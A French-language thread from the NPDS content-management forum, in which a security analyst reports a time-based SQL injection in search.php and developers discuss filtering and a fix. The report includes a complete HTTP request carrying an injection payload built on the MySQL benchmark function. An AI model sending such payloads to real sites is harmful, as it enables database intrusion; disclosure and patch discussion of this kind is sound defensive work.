logo

NPDS : Gestion de contenu et de communauté


Content & Community Management System (CCMS) robuste, sécurisé, complet, performant, parlant vraiment français, libre (Open-Source) et gratuit.
15 visiteur(s) et 0 membre(s) en ligne.
Activité du Site

Pages vues depuis 25/05/2001 : 106 562 043

  • Nb. de membres 8 693
  • Nb. d'articles 1 695
  • Nb. de forums 26
  • Nb. de sujets 8
  • Nb. de critiques 92

Top 10  Statistiques

Index du forum »»  Sécurité »» Remote-Time Based SQL Injection

Nouveau sujet
 Remote-Time Based SQL Injection#26189Répondre

3Contributeur(s)
Anonymedeveloppeurpagestec
3 Modérateur(s)
developpeurjpbJireck
Anonyme Anonymeicon_post
Rporting a Time based sql injection

Reported By - Narendra Bhati
Email - bhati.contact@gmail.com
Security Analyst @ Suma Soft. Pvt. Ltd
======================================

TIme based sql injection http request = which is taking a time to response which make me confirm that there is a sql injection
===============================================
POST /npds/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/npds/index.php?op=edito
Cookie: admin=; pun_cookie_b03d0f=1%7C5c85108006f3ca4b272432a5be442deb43756d9c%7C1447517668%7C75fabcf00a72c6c06c40ec432c44c158a90fe85b; Elgg_install=0vsakk8pm4ksu1je3fp48krjv0; Elgg=8ojmn31jmhn2sntglokbokm0t1
Connection: keep-alive
!content-type:! application/x-www-form-urlencoded
Content-Length: 63

query=asdads%3Cxss%3E')and%20benchmark(20000000%2csha1(1))--%20
===================================================================
developpeur developpeuricon_post
thanks / We take in consideration as soon as possible.

In case : developpeur_@_npds.org

developpeur developpeuricon_post
Le principe est de vérifier si une requête SQL est capable d’exécuter l'instruction sql 'benchmark' (qui prend du temps) et donc de potentiellement être (l'instruction SQL) sensible à une SQL Injection

C'est brillant et merci à Narendra Bhati (Security Analyst - IT Risk & Security Management Services chez Suma Soft).

Ceci étant toutes les requêtes SQL sont filtrées par url_protect et je suis donc en train de voir si cela est suffisant.

A suivre
pagestec pagestecicon_post
coucou dev :-)
Anonyme Anonymeicon_post
Coucou pagestec
Anonyme Anonymeicon_post
Une suite est donnée à cette intervention ou pas svp ?
Anonyme Anonymeicon_post
Apres analyse, le filtrage sur le fichier search.php fait son travail.
Le filtrage de l'instruction benchmark sera rajouté ceci étant.

Encore merci à Narendra Bhati pour son travail

Developpeur